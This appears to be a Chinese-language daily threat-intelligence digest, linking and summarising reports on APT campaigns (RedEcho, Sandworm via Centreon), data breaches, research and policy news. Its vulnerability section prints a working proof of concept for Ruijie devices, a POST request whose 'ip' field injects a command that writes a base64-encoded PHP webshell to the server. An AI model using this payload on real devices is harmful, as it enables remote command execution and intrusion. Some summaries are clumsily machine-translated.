高级威胁分析
1、China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions
https://www.recordedfuture.com/redecho-targeting-indian-power-sector/
https://go.recordedfuture.com/redecho-insikt-group-report
2、法国安全机构ANSSI在2020年12月发起了一场类似于SolarWinds事件的攻击。攻击者通过带有Centreon平台的服务器来监视组织的网络,该服务器用于监视IT基础架构。受损的组织尤其包括Web托管服务提供商。这条路通向俄罗斯APT乐队Sandworm。
法国国家信息系统安全局(ANSSI)报告了对一项为期数年的运动的调查,其中攻击者以未知的方式安装了Centreon监视工具,从而使服务器渗透到服务器中。ANSSI根据所使用的C&C基础设施,将此战役与俄罗斯军事APT团体Sandworm(也称为Voodoo Bear或BlackEnergy)联系起来。该机构透露入侵了几家法国公司的系统,尤其是Web托管提供商,这些事件发生在2017年至2020年之间。
在暴露于Internet的受到威胁的Centreon服务器上,攻击者创建了两种类型的后门。一种是PAS Webshell版本3.1.4,另一种是RAT Exaramel。攻击者因此获得了对其所参与的受感染系统和网络的控制。他们可以下载,上传和编辑文件,搜索文件系统,远程执行命令,与SQL数据库进行交互以及发起暴力密码攻击。与C&C基础结构的通信是通过HTTPS协议进行的。
在发现的受感染服务器上,Centreon的最新版本为2.5.2。
https://www.csirt.gov.sk/oznamenia-a-varovania-803.html?id=402
技术分享
1、2020年托管安全服务趋势报告
https://www.cybersecurity-insiders.com/portfolio/2020-managed-security-services-trends-report/
2、The CNAME of the Game: Large-scale Analysis of DNS-based Tracking Evasion。基于DNS的跟踪逃逸的大规模分析
https://arxiv.org/abs/2102.09301
3、OSINT
https://sector035.nl/articles/2021-08
4、Go语言在高级威胁中逐渐成为常用脚本
https://www.intezer.com/resource/year-of-the-gopher-2020-go-malware-round-up/
数据泄露
1、美国电信提供商T-Mobile已披露了数据泄露事件,原因是未知数量的客户显然受到SIM交换攻击的影响
https://www.bleepingcomputer.com/news/security/t-mobile-discloses-data-breach-after-sim-swapping-attacks/
2、DDoSecrets公开了属于已注册Gab用户的70 GB的敏感数据,Gab是一个右翼社交网络平台,声称提供“言论自由”,没有任何审查制度。其中包括白人至上主义者,新纳粹主义者,白人民族主义者,另类右翼人士和QAnon阴谋理论家。(具体地址自己找吧)
https://www.hackread.com/gab-hacked-ddosecrets-leak-profiles-posts-dms-passwords-online/
3、SuperVPN,GeckoVPN和ChatVPN 用户数据泄露,涉及2100万条用户记录
https://cybernews.com/security/one-of-the-biggest-android-vpns-hacked-data-of-21-million-users-from-3-android-vpns-put-for-sale-online/
漏洞相关
1、锐捷某设备型号RCE
PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K” | base64 -d POC:POST /guest_auth/guestIsUp.php ip = 127.0.0.1 | echo“ PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K” | base64 -d> poc.php / mac = est = 00
2、
https://ssd-disclosure.com/nxp-mifare-integrated-chips/
网络战与网络情报
1、上周周五举行的关于SolarWinds的监督与改革和国土安全内务委员会的听证会上,关于SolarWinds密码泄露的锅甩给了实习生……
https://homeland.house.gov/weathering-the-storm-the-role-of-private-tech-in-the-solarwinds-breach-and-the-ongoing-campaign
https://thehackernews.com/2021/03/solarwinds-blame-intern-for-weak.html
2、NSA 采用零信任模型
https://us-cert.cisa.gov/ncas/current-activity/2021/02/26/nsa-releases-guidance-zero-trust-security-model
3、厄瓜多尔最大的私人银行Banco Pichincha和该国财政部被黑客入侵
https://twitter.com/SecurChronicle/status/1364266545459851266/photo/1
安全厂商动态
1、crowdstrike 新功能。研究对手。
https://adversary.crowdstrike.com/
本文始发于微信公众号(ThreatPage全球威胁情报):今日威胁情报2021/2/27-28(第353期)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论